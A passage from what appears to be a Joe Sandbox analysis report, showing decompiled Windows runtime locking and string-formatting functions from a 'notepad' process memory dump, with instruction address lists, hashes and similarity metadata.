                                                    					} else {
                                                    						return 1;
                                                    					}
                                                    				}
                                                    				L59:
			}
                                                    0x00b5055a
                                                    0x00b5055d
                                                    0x00b50563
                                                    0x00b50566
                                                    0x00b505d8
                                                    0x00b505e2
                                                    0x00b505e5
                                                    0x00000000
                                                    0x00b505e7
                                                    0x00b505e7
                                                    0x00b505ea
                                                    0x00b505f3
                                                    0x00b505f3
                                                    0x00b50568
                                                    0x00b50568
                                                    0x00b50568
                                                    0x00b50569
                                                    0x00b50569
                                                    0x00b50569
                                                    0x00b5056b
                                                    0x00000000
                                                    0x00000000
                                                    0x00b7217f
                                                    0x00b72183
                                                    0x00b7225b
                                                    0x00b7225f
                                                    0x00b72189
                                                    0x00b7218c
                                                    0x00b7218f
                                                    0x00b72194
                                                    0x00b72199
                                                    0x00b7219d
                                                    0x00b721a0
                                                    0x00b721a2
                                                    0x00b721ce
                                                    0x00b721ce
                                                    0x00b721ce
                                                    0x00b721d0
                                                    0x00b721d6
                                                    0x00b721de
                                                    0x00b721e2
                                                    0x00b721e8
                                                    0x00b721e9
                                                    0x00b721ec
                                                    0x00b721f1
                                                    0x00b721f6
                                                    0x00000000
                                                    0x00000000
                                                    0x00b721f8
                                                    0x00b721fb
                                                    0x00b72206
                                                    0x00b7220b
                                                    0x00b7220c
                                                    0x00b72217
                                                    0x00b72226
                                                    0x00b7222b
                                                    0x00b7222c
                                                    0x00b7222f
                                                    0x00b72232
                                                    0x00b72235
                                                    0x00b72235
                                                    0x00b7223a
                                                    0x00b7223f
                                                    0x00b72241
                                                    0x00b72243
                                                    0x00b72248
                                                    0x00b72248
                                                    0x00b7224d
                                                    0x00b7224f
                                                    0x00b72262
                                                    0x00b72263
                                                    0x00b72268
                                                    0x00b72269
                                                    0x00b72269
                                                    0x00b72269
                                                    0x00b7226d
                                                    0x00000000
                                                    0x00000000
                                                    0x00b72276
                                                    0x00b72279
                                                    0x00b7227e
                                                    0x00b72283
                                                    0x00b72287
                                                    0x00b7228a
                                                    0x00b7228d
                                                    0x00b7228f
                                                    0x00b722bc
                                                    0x00b722bc
                                                    0x00b722bc
                                                    0x00b722be
                                                    0x00b722c4
                                                    0x00b722cc
                                                    0x00b722d0
                                                    0x00b722d6
                                                    0x00b722d7
                                                    0x00b722da
                                                    0x00b722df
                                                    0x00b722e4
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722e6
                                                    0x00b722e9
                                                    0x00b722f4
                                                    0x00b722f9
                                                    0x00b722fa
                                                    0x00b72305
                                                    0x00b72314
                                                    0x00b72319
                                                    0x00b7231a
                                                    0x00b7231d
                                                    0x00b72320
                                                    0x00b72323
                                                    0x00b72323
                                                    0x00b72328
                                                    0x00b7232d
                                                    0x00b7232f
                                                    0x00b72331
                                                    0x00b72336
                                                    0x00b72336
                                                    0x00b7233b
                                                    0x00b7233d
                                                    0x00b72350
                                                    0x00b72351
                                                    0x00b72356
                                                    0x00b72359
                                                    0x00b72359
                                                    0x00b7235b
                                                    0x00b7235d
                                                    0x00b35367
                                                    0x00b3536b
                                                    0x00b35372
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b72363
                                                    0x00b72363
                                                    0x00b72369
                                                    0x00b7236a
                                                    0x00b7236c
                                                    0x00b72371
                                                    0x00b72373
                                                    0x00000000
                                                    0x00b72379
                                                    0x00b72379
                                                    0x00b7237a
                                                    0x00b7237f
                                                    0x00b7237f
                                                    0x00b72385
                                                    0x00b72386
                                                    0x00b72389
                                                    0x00b7238e
                                                    0x00b72390
                                                    0x00b35378
                                                    0x00b3537c
                                                    0x00b72396
                                                    0x00b72396
                                                    0x00b72397
                                                    0x00b7239c
                                                    0x00b723a2
                                                    0x00b723a3
                                                    0x00b723a6
                                                    0x00b723ab
                                                    0x00b723ad
                                                    0x00000000
                                                    0x00b723b3
                                                    0x00b723b3
                                                    0x00b723b4
                                                    0x00b723b9
                                                    0x00b723ba
                                                    0x00b723ba
                                                    0x00b723bc
                                                    0x00b723bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00b69153
                                                    0x00b69158
                                                    0x00b6915a
                                                    0x00b6915e
                                                    0x00b69160
                                                    0x00000000
                                                    0x00b69166
                                                    0x00b69166
                                                    0x00b69171
                                                    0x00b69176
                                                    0x00b69176
                                                    0x00000000
                                                    0x00b69160
                                                    0x00b723c6
                                                    0x00b723ce
                                                    0x00b723d7
                                                    0x00b723d7
                                                    0x00b723ad
                                                    0x00b72390
                                                    0x00b72373
                                                    0x00b7233f
                                                    0x00b7233f
                                                    0x00000000
                                                    0x00b7233f
                                                    0x00b72291
                                                    0x00b72291
                                                    0x00b72293
                                                    0x00b72295
                                                    0x00b7229a
                                                    0x00b722a1
                                                    0x00b722a3
                                                    0x00b722a7
                                                    0x00b722a9
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722ab
                                                    0x00b722ad
                                                    0x00b722af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722af
                                                    0x00b722b1
                                                    0x00b722b4
                                                    0x00b722b4
                                                    0x00b722b6
                                                    0x00b353be
                                                    0x00b353be
                                                    0x00b353be
                                                    0x00b353c0
                                                    0x00000000
                                                    0x00000000
                                                    0x00b353cb
                                                    0x00b353ce
                                                    0x00b353d0
                                                    0x00b353d4
                                                    0x00b353d6
                                                    0x00000000
                                                    0x00b353d8
                                                    0x00b353e3
                                                    0x00b353ea
                                                    0x00b353ea
                                                    0x00000000
                                                    0x00b353d6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722b6
                                                    0x00000000
                                                    0x00b7228f
                                                    0x00b72349
                                                    0x00b7234d
                                                    0x00b72251
                                                    0x00b72251
                                                    0x00000000
                                                    0x00b72251
                                                    0x00b721a4
                                                    0x00b721a4
                                                    0x00b721a6
                                                    0x00b721a8
                                                    0x00b721ac
                                                    0x00b721b6
                                                    0x00b721b8
                                                    0x00b721bc
                                                    0x00b721be
                                                    0x00000000
                                                    0x00000000
                                                    0x00b721c0
                                                    0x00b721c2
                                                    0x00b721c4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b721c4
                                                    0x00b721c6
                                                    0x00b721c6
                                                    0x00b721c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b721c8
                                                    0x00b721a2
                                                    0x00000000
                                                    0x00b72183
                                                    0x00b5057b
                                                    0x00b5057d
                                                    0x00b50581
                                                    0x00b50583
                                                    0x00b72178
                                                    0x00000000
                                                    0x00b50589
                                                    0x00b5058f
                                                    0x00b5058f
                                                    0x00b50583
                                                    0x00000000

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B72206
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
• Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-4236105082
                                                    • Opcode ID: 30dc7a8b503ac9a6e6dc9bceb7d63e8e4afb4c06abd61b2aafe6e3c4d8877542
                                                    • Instruction ID: 342b7d80cdc4228f8a8159c3e876e297b654e4a0ed721b57127dbd3c69555a1a
                                                    • Opcode Fuzzy Hash: 30dc7a8b503ac9a6e6dc9bceb7d63e8e4afb4c06abd61b2aafe6e3c4d8877542
                                                    • Instruction Fuzzy Hash: 64512971B002016FEB149B18CCC1FA633E9EF94711F2182E9FD59EB2C6EA21EC418790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 64%
                                                    			E00B514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                    				signed int _v8;
                                                    				char _v10;
                                                    				char _v140;
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t24;
                                                    				void* _t26;
                                                    				signed int _t29;
                                                    				signed int _t34;
                                                    				signed int _t40;
                                                    				intOrPtr _t45;
                                                    				void* _t51;
                                                    				intOrPtr* _t52;
                                                    				void* _t54;
                                                    				signed int _t57;
                                                    				void* _t58;
                                                    
                                                    				_t51 = __edx;
                                                    				_t24 =  *0xbf2088; // 0x74b3f05d
                                                    				_v8 = _t24 ^ _t57;
                                                    				_t45 = _a16;
                                                    				_t53 = _a4;
                                                    				_t52 = _a20;
                                                    				if(_a4 == 0 || _t52 == 0) {
                                                    					L10:
                                                    					_t26 = 0xc000000d;
                                                    				} else {
                                                    					if(_t45 == 0) {
                                                    						if( *_t52 == _t45) {
                                                    							goto L3;
                                                    						} else {
                                                    							goto L10;
                                                    						}
                                                    					} else {
                                                    						L3:
                                                    						_t28 =  &_v140;
                                                    						if(_a12 != 0) {
                                                    							_push("[");
                                                    							_push(0x41);
                                                    							_push( &_v140);
                                                    							_t29 = E00B47707();
                                                    							_t58 = _t58 + 0xc;
                                                    							_t28 = _t57 + _t29 * 2 - 0x88;
                                                    						}
                                                    						_t54 = E00B513CB(_t53, _t28);
                                                    						if(_a8 != 0) {
                                                    							_t34 = E00B47707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                    							_t58 = _t58 + 0x10;
                                                    							_t54 = _t54 + _t34 * 2;
                                                    						}
                                                    						if(_a12 != 0) {
                                                    							_t40 = E00B47707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                    							_t58 = _t58 + 0x10;
                                                    							_t54 = _t54 + _t40 * 2;
                                                    						}
                                                    						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                    						 *_t52 = _t53;
                                                    						if( *_t52 < _t53) {
                                                    							goto L10;
                                                    						} else {
                                                    							E00B12340(_t45,  &_v140, _t53 + _t53);
                                                    							_t26 = 0;
                                                    						}
                                                    					}
                                                    				}
                                                    				return E00B1E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}

                                                    0x00b514c0
                                                    0x00b514cb
                                                    0x00b514d2
                                                    0x00b514d6
                                                    0x00b514da
                                                    0x00b514de
                                                    0x00b514e3
                                                    0x00b5157a
                                                    0x00b5157a
                                                    0x00b514f1
                                                    0x00b514f3
                                                    0x00b7ea0f
                                                    0x00000000
                                                    0x00b7ea15
                                                    0x00000000
                                                    0x00b7ea15
                                                    0x00b514f9
                                                    0x00b514f9
                                                    0x00b514fe
                                                    0x00b51504
                                                    0x00b7ea1a
                                                    0x00b7ea1f
                                                    0x00b7ea21
                                                    0x00b7ea22
                                                    0x00b7ea27
                                                    0x00b7ea2a
                                                    0x00b7ea2a
                                                    0x00b51515
                                                    0x00b51517
                                                    0x00b5156d
                                                    0x00b51572
                                                    0x00b51575
                                                    0x00b51575
                                                    0x00b5151e
                                                    0x00b7ea50
                                                    0x00b7ea55
                                                    0x00b7ea58
                                                    0x00b7ea58
                                                    0x00b5152e
                                                    0x00b51531
                                                    0x00b51533
                                                    0x00000000
                                                    0x00b51535
                                                    0x00b51541
                                                    0x00b51549
                                                    0x00b51549
                                                    0x00b51533
                                                    0x00b514f3
                                                    0x00b51559

                                                    APIs
                                                    • ___swprintf_l.LIBCMT ref: 00B7EA22
                                                      • Part of subcall function 00B513CB: ___swprintf_l.LIBCMT ref: 00B5146B
                                                      • Part of subcall function 00B513CB: ___swprintf_l.LIBCMT ref: 00B51490
                                                    • ___swprintf_l.LIBCMT ref: 00B5156D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
• Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: da6d95f45460e8b803f473725127419fdf25b5faefc7434d5df81292f3082721
                                                    • Instruction ID: a070edcfbb4b1963e6be78a14e79dbe3cc44c9cf8a73ed877b36405eee24525e
                                                    • Opcode Fuzzy Hash: da6d95f45460e8b803f473725127419fdf25b5faefc7434d5df81292f3082721
                                                    • Instruction Fuzzy Hash: 04217F72900219ABCB219E58D841BEA73ECEB64701F8449E5EC56A3140EB70EA588BE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 45%
                                                    			E00B353A5(signed int _a4, char _a8) {
                                                    				void* __ebx;
                                                    				void* __edi;
                                                    				void* __esi;
                                                    				signed int _t32;
                                                    				signed int _t37;
                                                    				signed int _t40;
                                                    				signed int _t42;
                                                    				void* _t45;
                                                    				intOrPtr _t46;
                                                    				void* _t48;
                                                    				signed int _t49;
                                                    				void* _t51;
                                                    				signed int _t57;
                                                    				signed int _t64;
                                                    				signed int _t71;
                                                    				void* _t74;
                                                    				intOrPtr _t78;
                                                    				signed int* _t79;
                                                    				void* _t85;
                                                    				signed int _t86;
                                                    				signed int _t92;
                                                    				void* _t104;
                                                    				void* _t105;
                                                    
                                                    				_t64 = _a4;
                                                    				_t32 =  *(_t64 + 0x28);
                                                    				_t71 = _t64 + 0x28;
                                                    				_push(_t92);
                                                    				if(_t32 < 0) {
                                                    					_t78 =  *[fs:0x18];
                                                    					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                    					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                    						goto L3;
                                                    					} else {
                                                    						__eflags = _t32 | 0xffffffff;
                                                    						asm("lock xadd [ecx], eax");
                                                    						return 1;
                                                    					}
                                                    				} else {
                                                    					L3:
                                                    					_push(_t86);
                                                    					while(1) {
                                                    						L4:
                                                    						__eflags = _t32;
                                                    						if(_t32 == 0) {
                                                    							break;
                                                    						}
                                                    						__eflags = _a8;
                                                    						if(_a8 == 0) {
                                                    							__eflags = 0;
                                                    							return 0;
                                                    						} else {
                                                    							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                    							_t79 = _t64 + 0x24;
                                                    							_t71 = 1;
                                                    							asm("lock xadd [eax], ecx");
                                                    							_t32 =  *(_t64 + 0x28);
                                                    							_a4 = _t32;
                                                    							__eflags = _t32;
                                                    							if(_t32 != 0) {
                                                    								L19:
                                                    								_t86 = 0;
                                                    								__eflags = 0;
                                                    								while(1) {
                                                    									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                    									asm("sbb esi, esi");
                                                    									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00bf01c0;
                                                    									_push(_t92);
                                                    									_push(0);
                                                    									_t37 = E00B0F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                    									__eflags = _t37 - 0x102;
                                                    									if(_t37 != 0x102) {
                                                    										break;
                                                    									}
                                                    									_t71 =  *(_t92 + 4);
                                                    									_t85 =  *_t92;
                                                    									_t51 = L00B54FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                    									_push(_t85);
                                                    									_push(_t51);
                                                    									L00B63F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                    									L00B63F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                    									_t86 = _t86 + 1;
                                                    									_t105 = _t104 + 0x28;
                                                    									__eflags = _t86 - 2;
                                                    									if(__eflags > 0) {
                                                    										E00B9217A(_t71, __eflags, _t64);
                                                    									}
                                                    									_push("RTL: Re-Waiting\n");
                                                    									_push(0);
                                                    									_push(0x65);
                                                    									L00B63F92();
                                                    									_t104 = _t105 + 0xc;
                                                    								}
                                                    								__eflags = _t37;
                                                    								if(__eflags < 0) {
                                                    									_push(_t37);
                                                    									E00B53915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                    									asm("int3");
                                                    									_t40 =  *_t71;
                                                    									 *_t71 = 0;
                                                    									__eflags = _t40;
                                                    									if(_t40 == 0) {
                                                    										L1:
                                                    										_t42 = E00B35384(_t92 + 0x24);
                                                    										if(_t42 != 0) {
                                                    											goto L31;
                                                    										} else {
                                                    											goto L2;
                                                    										}
                                                    									} else {
                                                    										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                    										_push( &_a4);
                                                    										_push(_t40);
                                                    										_t49 = E00B0F970( *((intOrPtr*)(_t92 + 0x18)));
                                                    										__eflags = _t49;
                                                    										if(__eflags >= 0) {
                                                    											goto L1;
                                                    										} else {
                                                    											_push(_t49);
                                                    											E00B53915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                    											L31:
                                                    											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                    											_push( &_a4);
                                                    											_push(1);
                                                    											_t42 = E00B0F970( *((intOrPtr*)(_t92 + 0x20)));
                                                    											__eflags = _t42;
                                                    											if(__eflags >= 0) {
                                                    												L2:
                                                    												return _t42;
                                                    											} else {
                                                    												_push(_t42);
                                                    												E00B53915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                    												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                    												_push( &_a4);
                                                    												_push(1);
                                                    												_t42 = E00B0F970( *((intOrPtr*)(_t92 + 0x20)));
                                                    												__eflags = _t42;
                                                    												if(__eflags >= 0) {
                                                    													goto L2;
                                                    												} else {
                                                    													_push(_t42);
                                                    													_t45 = E00B53915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                    													asm("int3");
                                                    													while(1) {
                                                    														_t74 = _t45;
                                                    														__eflags = _t45 - 1;
                                                    														if(_t45 != 1) {
                                                    															break;
                                                    														}
                                                    														_t86 = _t86 | 0xffffffff;
                                                    														_t45 = _t74;
                                                    														asm("lock cmpxchg [ebx], edi");
                                                    														__eflags = _t45 - _t74;
                                                    														if(_t45 != _t74) {
                                                    															continue;
                                                    														} else {
                                                    															_t46 =  *[fs:0x18];
                                                    															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                    															return _t46;
                                                    														}
                                                    														goto L38;
                                                    													}
                                                    													E00B35329(_t74, _t92);
                                                    													_push(1);
                                                    													_t48 = E00B353A5(_t92);
                                                    													return _t48;
                                                    												}
                                                    											}
                                                    										}
                                                    									}
                                                    								} else {
                                                    									_t32 =  *(_t64 + 0x28);
                                                    									continue;
                                                    								}
                                                    							} else {
                                                    								_t71 =  *_t79;
                                                    								__eflags = _t71;
                                                    								if(__eflags > 0) {
                                                    									while(1) {
                                                    										_t57 = _t71;
                                                    										asm("lock cmpxchg [edi], esi");
                                                    										__eflags = _t57 - _t71;
                                                    										if(_t57 == _t71) {
                                                    											break;
                                                    										}
                                                    										_t71 = _t57;
                                                    										__eflags = _t57;
                                                    										if(_t57 > 0) {
                                                    											continue;
                                                    										}
                                                    										break;
                                                    									}
                                                    									_t32 = _a4;
                                                    									__eflags = _t71;
                                                    								}
                                                    								if(__eflags != 0) {
                                                    									continue;
                                                    								} else {
                                                    									goto L19;
                                                    								}
                                                    							}
                                                    						}
                                                    						goto L38;
                                                    					}
                                                    					_t71 = _t71 | 0xffffffff;
                                                    					_t32 = 0;
                                                    					asm("lock cmpxchg [edx], ecx");
                                                    					__eflags = 0;
                                                    					if(0 != 0) {
                                                    						goto L4;
                                                    					} else {
                                                    						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                    						return 1;
                                                    					}
                                                    				}
                                                    				L38:
			}

                                                    0x00b353ab
                                                    0x00b353ae
                                                    0x00b353b1
                                                    0x00b353b4
                                                    0x00b353b7
                                                    0x00b505b6
                                                    0x00b505c0
                                                    0x00b505c3
                                                    0x00000000
                                                    0x00b505c9
                                                    0x00b505c9
                                                    0x00b505cc
                                                    0x00b505d5
                                                    0x00b505d5
                                                    0x00b353bd
                                                    0x00b353bd
                                                    0x00b353bd
                                                    0x00b353be
                                                    0x00b353be
                                                    0x00b353be
                                                    0x00b353c0
                                                    0x00000000
                                                    0x00000000
                                                    0x00b72269
                                                    0x00b7226d
                                                    0x00b72349
                                                    0x00b7234d

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B722F4
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 00B72328
                                                    • RTL: Resource at %p, xrefs: 00B7230B
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B722FC
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
• Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmp
• Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-871070163
                                                    • Opcode ID: f3bb2d713230d7299c155d975a099bee1012bad1f5eb7dd3b2d6b4266d5c8e18
                                                    • Instruction ID: c9631f6723fa05ebe37def8d7ffcc230353ff0b63a7689a9daa7c4ad1b597562
                                                    • Opcode Fuzzy Hash: f3bb2d713230d7299c155d975a099bee1012bad1f5eb7dd3b2d6b4266d5c8e18
                                                    • Instruction Fuzzy Hash: 6B5128717007056BDB20DB28CC81FA673E8EF54760F2182E9FD59DB282EA71ED4187A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 51%
                                                    			E00B3EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                    				intOrPtr _v8;
                                                    				intOrPtr _v12;
                                                    				signed int _v24;
                                                    				intOrPtr* _v28;
                                                    				intOrPtr _v32;
                                                    				signed int _v36;
                                                    				intOrPtr _v40;
                                                    				short _v66;
                                                    				char _v72;
                                                    				void* __esi;
                                                    				intOrPtr _t38;
                                                    				intOrPtr _t39;
                                                    				signed int _t40;
                                                    				intOrPtr _t42;
                                                    				intOrPtr _t43;
                                                    				signed int _t44;
                                                    				void* _t46;
                                                    				intOrPtr _t48;
                                                    				signed int _t49;
                                                    				intOrPtr _t50;
                                                    				intOrPtr _t53;
                                                    				signed char _t67;
                                                    				void* _t72;
                                                    				intOrPtr _t77;
                                                    				intOrPtr* _t80;
                                                    				intOrPtr _t84;
                                                    				intOrPtr* _t85;
                                                    				void* _t91;
                                                    				void* _t92;
                                                    				void* _t93;
                                                    
                                                    				_t80 = __edi;
                                                    				_t75 = __edx;
                                                    				_t70 = __ecx;
                                                    				_t84 = _a4;
                                                    				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                    					E00B2DA92(__ecx, __edx, __eflags, _t84);
                                                    					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                    				}
                                                    				_push(0);
                                                    				__eflags = _t38 - 0xffffffff;
                                                    				if(_t38 == 0xffffffff) {
                                                    					_t39 =  *0xbf793c; // 0x0
                                                    					_push(0);
                                                    					_push(_t84);
                                                    					_t40 = E00B116C0(_t39);
                                                    				} else {
                                                    					_t40 = E00B0F9D4(_t38);
                                                    				}
                                                    				_pop(_t85);
                                                    				__eflags = _t40;
                                                    				if(__eflags < 0) {
                                                    					_push(_t40);
                                                    					E00B53915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                    					asm("int3");
                                                    					while(1) {
                                                    						L21:
                                                    						_t76 =  *[fs:0x18];
                                                    						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                    						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                    						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                    							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                    							_v66 = 0x1722;
                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                    							_t76 =  &_v72;
                                                    							_push( &_v72);
                                                    							_v28 = _t85;
                                                    							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                    							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                    							_push(0x10);
                                                    							_push(0x20402);
                                                    							E00B101A4( *0x7ffe0382 & 0x000000ff);
                                                    						}
                                                    						while(1) {
                                                    							_t43 = _v8;
                                                    							_push(_t80);
                                                    							_push(0);
                                                    							__eflags = _t43 - 0xffffffff;
                                                    							if(_t43 == 0xffffffff) {
                                                    								_t71 =  *0xbf793c; // 0x0
                                                    								_push(_t85);
                                                    								_t44 = L00B11F28(_t71);
                                                    							} else {
                                                    								_t44 = E00B0F8CC(_t43);
                                                    							}
                                                    							__eflags = _t44 - 0x102;
                                                    							if(_t44 != 0x102) {
                                                    								__eflags = _t44;
                                                    								if(__eflags < 0) {
                                                    									_push(_t44);
                                                    									E00B53915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                    									asm("int3");
                                                    									E00B92306(_t85);
                                                    									__eflags = _t67 & 0x00000002;
                                                    									if((_t67 & 0x00000002) != 0) {
                                                    										_t7 = _t67 + 2; // 0x4
                                                    										_t72 = _t7;
                                                    										asm("lock cmpxchg [edi], ecx");
                                                    										__eflags = _t67 - _t67;
                                                    										if(_t67 == _t67) {
                                                    											E00B3EC56(_t72, _t76, _t80, _t85);
                                                    										}
                                                    									}
                                                    									return 0;
                                                    								} else {
                                                    									__eflags = _v24;
                                                    									if(_v24 != 0) {
                                                    										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                    									}
                                                    									return 2;
                                                    								}
                                                    								goto L36;
                                                    							}
                                                    							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                    							_push(_t67);
                                                    							_t46 = L00B54FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                    							_push(_t77);
                                                    							L00B63F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                    							_t48 =  *_t85;
                                                    							_t92 = _t91 + 0x18;
                                                    							__eflags = _t48 - 0xffffffff;
                                                    							if(_t48 == 0xffffffff) {
                                                    								_t49 = 0;
                                                    								__eflags = 0;
                                                    							} else {
                                                    								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                    							}
                                                    							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                    							_push(_t49);
                                                    							_t50 = _v12;
                                                    							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                    							_push(_t85);
                                                    							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                    							_push( *((intOrPtr*)(_t50 + 0x24)));
                                                    							L00B63F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                                    							_t53 =  *_t85;
                                                    							_t93 = _t92 + 0x20;
                                                    							_t67 = _t67 + 1;
                                                    							__eflags = _t53 - 0xffffffff;
                                                    							if(_t53 != 0xffffffff) {
                                                    								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                                    								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                                    							}
                                                    							__eflags = _t67 - 2;
                                                    							if(_t67 > 2) {
                                                    								__eflags = _t85 - 0xbf20c0;
                                                    								if(_t85 != 0xbf20c0) {
                                                    									_t76 = _a4;
                                                    									__eflags = _a4 - _a8;
